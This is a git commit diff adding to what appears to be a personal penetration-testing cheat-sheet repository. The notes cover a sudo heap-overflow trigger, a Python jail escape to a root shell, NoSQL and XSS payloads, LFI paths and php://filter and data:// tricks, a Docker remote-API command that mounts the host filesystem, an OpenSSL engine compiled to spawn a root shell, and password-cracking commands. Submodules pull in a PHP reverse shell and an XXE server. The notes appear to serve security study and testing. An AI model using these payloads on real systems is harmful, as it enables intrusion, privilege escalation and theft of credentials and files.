some more docker

2021-12-09 01:50:04 +01:00 · 2021-12-09 01:50:04 +01:00 · 512b365a34
parent cefc5b209a
commit 512b365a34
14 changed files with 167 additions and 10 deletions
--- a/.gitmodules
+++ b/.gitmodules
@ -88,3 +88,9 @@
 [submodule "post_exploitation/Invoke-EDRChecker"]
 	path = post_exploitation/Invoke-EDRChecker
 	url = https://github.com/PwnDexter/Invoke-EDRChecker.git
+[submodule "reverse_shells/phpreverseshell"]
+	path = reverse_shells/phpreverseshell
+	url = https://github.com/rootkral4/phpreverseshell.git
+[submodule "exploit/web/xxe/xxeserv"]
+	path = exploit/web/xxe/xxeserv
+	url = https://github.com/staaldraad/xxeserv.git
--- a/exploit/linux/sudo/baron_samedit.md
+++ b/exploit/linux/sudo/baron_samedit.md
@ -8,6 +8,7 @@
 ```sh
 sudoedit -s '\' $(python -c "print('\x41' * 10000)")
 ```
-
-
-
+* Defaults to try
+```sh
+./brute.sh 90 120 50 70 150 300
+```
--- a/exploit/python/jail_escape.md
+++ b/exploit/python/jail_escape.md
@ -0,0 +1,18 @@
+# Escaping Jails
+
+* [Aneesh's blog](https://anee.me/escaping-python-jails-849c65cf306e?gi=a7d3bac81831)
+
+## Usage
+
+* Circumvent via `__builtins__`
+```python
+dir(__builtins__)
+```
+```python
+__builtins__.__dict__
+```
+* Call builtins
+```python
+__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('/bin/bash -p')
+```
+
--- a/exploit/sqli/no_sqli.md
+++ b/exploit/sqli/no_sqli.md
@ -9,7 +9,26 @@
 * [MongoDB operators](https://docs.mongodb.com/manual/reference/operator/query/)
 * [Elasticsearch docs](https://www.elastic.co/guide/index.html)

+# Operators
+* Most common
+```sql
+$and
+$or
+$eq
+$ne
+$gt
+$where
+$exists
+$regex
+```
+
 ## Tips & Tricks

 * Pass HTTP parameter as an array instead of `user=` and `password=` use `user[$operator]=foo` and `password[$operator]=bar`
    * 2D array via `user[$nin][]=foo`
+
+## Example
+* POST or GET parameters
+```sh
+username=admin&password[$ne]=admin
+```
--- a/exploit/web/csrf.md
+++ b/exploit/web/csrf.md
@ -1 +1,11 @@
 # CSRF
+
+## Protection
+
+* May be a hidden field with an encoded value
+```html
+    <input type="hidden" name="csrf_protect" value="eyJk..n0=">
+```
+* This field need to be removed in order to do some csrf shenanigans
+* Decode the value to reproduce some valid content.
+
--- a/exploit/web/local_file_inclusion.md
+++ b/exploit/web/local_file_inclusion.md
@ -2,6 +2,14 @@
 To test for LFI what we need is a parameter on any URL or other inputs, i.e. request body which includes a file. A parameter in the URL can look like `https://test.com/?file=robots.txt`, the file may be changed.

 * [Acunetix article](https://www.acunetix.com/blog/articles/remote-file-inclusion-rfi/)
+## PHP Functions
+* Functions provoking an LFI
+```php
+include()
+require()
+include_once ()
+require_once()
+```

 ## Usage

@ -37,18 +45,15 @@ curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20..
 * [outpost24](https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-2)
 *  Log poisoning and opening logfile via `/proc/self/fd/xx`.

-### Base64 Encoding via PHP
-* Circumvent filter via encoding local files included ins a GET parameter value
-```http
-curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=<fileOnServer>.php
-```
-
 ## Files of Interest
 * `/etc/issue`
 * `/etc/profile`
 * `/proc/version`
 * `/etc/passwd`
 * `/etc/shadow`
+* `/etc/group`
+* `/etc/motd`
+* `/etc/mysql/my.cnf`
 * `/root/.bash_history`
 * `/var/log/dmessage`
 * `/var/mail/root`
@ -56,10 +61,33 @@ curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=<
 * `/var/log/apache2/access.log`
 * `C:\boot.ini`
 * `/proc/self/fd/xx`
+* `/proc/version`
+* `/proc/cmdline`
+* `/proc/[0-9]*/fd/[0-9]*`
+
+* `sess_<cookieValue>` if the location of the session file is known. Some paths are
+```sh
+c:\Windows\Temp
+/tmp/
+/var/lib/php5
+/var/lib/php/session
+```
+
+### Base64 Encoding via PHP
+* Circumvent filter via encoding local files included ins a GET parameter value
+* __Read PHP files through encoding them, so they won't be executed__
+```http
+curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=<fileOnServer>.php
+curl http://test.com/test.php?file=php://filter/read=string.rot13/resource=/etc/passwd
+```
+* Use encoded data as input through the parameter
+```sh
+curl http://test.com/test.php?file=data://text/plain;base64,dGhlIGFuc3dlciBpcyA0Mgo=
+```

 ## Tricks

 * Terminate query with `%00` or `0x00` does the trick until PHP 5.3.4
 * Terminate query with `/.`
 * `..//..//..//file`, double slashes
-
+* URL encode path
--- a/exploit/web/xss.md
+++ b/exploit/web/xss.md
@ -124,6 +124,10 @@ document.onkeypress = function (e) {
 ## Tricks and Tips
 * Use Polyglots
 * [XSS Filter Evasion Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html)
+* Close the a vulnerable, exploitable tag and open a script tag
+```html
+</tag><script>alert(1);</script>
+```

 ## Protection Methods

--- a/exploit/web/xxe/xxeserv
+++ b/exploit/web/xxe/xxeserv
@ -0,0 +1 @@
+Subproject commit 046c559a3c1a65d3a41a2fb706807b9e48e66563
--- a/hashes/password_cracking/john.md
+++ b/hashes/password_cracking/john.md
@ -35,3 +35,9 @@ $[0-9]$[0-9]
 ```sh
 john --wordlist=single_password.txt --rules=best64 --stdout > out.txt
 ```
+
+### Subformats
+* Some salted passwords need dynamic rules
+```sh
+john --list=subformats
+```
--- a/hashes/password_cracking/sucrack.md
+++ b/hashes/password_cracking/sucrack.md
@ -0,0 +1,8 @@
+# sucrack
+
+* [Repo](https://github.com/hemp3l/sucrack.git)
+* Upload to target and build
+```sh
+sucrack -u <username> -w 100 <wordlist>
+```
+
--- a/misc/level3_hypervisor/docker_sec/docker.md
+++ b/misc/level3_hypervisor/docker_sec/docker.md
@ -41,6 +41,7 @@ dive <IMAGE-ID>
    ```sh 
    docker -H tcp://test.com:2375 ps
    docker -H tcp://test.com:2375 exec <container> <cmd>
+    docker -H tcp://$TARGET_IP:2375 run -it -v /:/mnt/host alpine:3.9 /bin/sh
    ```

 * [root please](https://registry.hub.docker.com/r/chrisfosterelli/rootplease)
--- a/misc/openssl/openssl_engine.md
+++ b/misc/openssl/openssl_engine.md
@ -0,0 +1,44 @@
+# OpenSSL Engine
+
+* Hook external libs
+* [OpenSSL blog](https://www.openssl.org/blog/blog/2015/10/08/engine-building-lesson-1-a-minimum-useless-engine/)
+
+* Most minimal example
+```C
+#include <openssl/engine.h>
+
+static int bind(ENGINE *e, const char *id)
+{
+  return 1;
+}
+
+IMPLEMENT_DYNAMIC_BIND_FN(bind)
+IMPLEMENT_DYNAMIC_CHECK_FN()
+```
+
+* Shell as root
+```C
+#include <openssl/engine.h>
+#include <unistd.h>
+
+static int bind(ENGINE *e, const char *id)
+{
+  setuid(0);
+  setgid(0);
+  system("/bin/bash");
+}
+
+IMPLEMENT_DYNAMIC_BIND_FN(bind)
+IMPLEMENT_DYNAMIC_CHECK_FN()
+```
+
+* Compile
+```C
+gcc -fPIC -o rootshell.o -c rootshell.c
+gcc -shared -o rootshell.so -c -lcrytpo rootshell.o
+```
+
+* Execute via
+```sh
+openssl engine -t `pwd`/rootshell.so
+```
--- a/post_exploitation/docs/windows/powershell_logs.md
+++ b/post_exploitation/docs/windows/powershell_logs.md
@ -0,0 +1,10 @@
+# Powershell Logs
+
+## Transcript Logs
+
+* Enable via
+```sh
+reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /t REG_DWORD /d 0x1 /f
+reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v OutputDirectory /t REG_SZ /d C:/ /f
+reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableInvocationHeader /t REG_DWORD /d 0x1 /f
+```
--- a/reverse_shells/phpreverseshell
+++ b/reverse_shells/phpreverseshell
@ -0,0 +1 @@
+Subproject commit 72873b93fa3d960ce35f8c46d6fd8195a45f17c0
				`@ -0,0 +1 @@`
				`Subproject commit 046c559a3c1a65d3a41a2fb706807b9e48e66563`
				`@ -0,0 +1 @@`
				`Subproject commit 72873b93fa3d960ce35f8c46d6fd8195a45f17c0`